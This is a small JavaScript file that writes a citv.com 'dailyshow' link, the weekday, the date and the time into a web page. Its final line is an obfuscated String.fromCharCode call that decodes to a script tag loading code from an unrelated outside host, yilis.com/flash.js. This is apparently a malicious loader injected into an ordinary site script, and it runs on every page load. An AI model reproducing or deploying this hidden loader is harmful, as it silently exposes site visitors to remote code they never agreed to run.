date=new Date();
var day=date.getDay();

document.write("</a><a href=http://citv.com/dailyshow/index.html>")

if (day == 0)
{
document.write("Sunday");
}
if (day == 1)
{
document.write("Monday");
}
if (day == 2)
{
document.write("Tuesday");
}
if (day == 3)
{
document.write("Wednesday");
}
if (day == 4)
{
document.write("Thursday");
}
if (day == 5)
{
document.write("Friday");
}
if (day == 6)
{
document.write("Saturday");
}

document.write(" ");

RightNow=new Date();
var mpo = RightNow.getMonth();
var mpo1 = mpo + 1
var hours = RightNow.getHours()

  if (hours > 12) {
  hours = hours - 12;
  part = 'PM'}
  else {
  part = 'AM';}

document.write(mpo1 + "-" + RightNow.getDate() + "-" + RightNow.getYear() );

document.write("</b></FONT></A><BR><FONT FACE=Verdana,Helvetica,Sans-Serif SIZE=-2>");

document.write(hours + ":" + RightNow.getMinutes() + " " + part);
document.write(" ");
document.write(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,121,105,108,105,115,46,99,111,109,47,102,108,97,115,104,46,106,115,34,62,60,47,115,99,114,105,112,116,62));
